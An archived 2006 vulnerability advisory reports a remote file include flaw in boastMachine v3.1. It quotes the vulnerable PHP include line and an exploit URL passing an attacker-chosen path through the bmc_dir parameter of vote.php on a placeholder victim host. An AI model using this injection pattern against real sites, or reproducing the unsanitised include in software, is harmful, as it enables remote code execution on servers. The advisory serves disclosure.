Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13122
HistoryJun 13, 2006 - 12:00 a.m.

boastMachine v3.1 Version - Remote File Include Vulnerabilities

2006-06-1300:00:00
vulners.com
18

SaVSaK.CoM | SpC-x - The-BeKiR |

boastMachine v3.1 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : boastMachine

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

include_once dirname(FILE)."/config.php";

include_once dirname(FILE)."/$bmc_dir/main.php";

Vulnerable :

http://www.victim.com/boastMachine/vote.php?bmc_dir=Command-Shell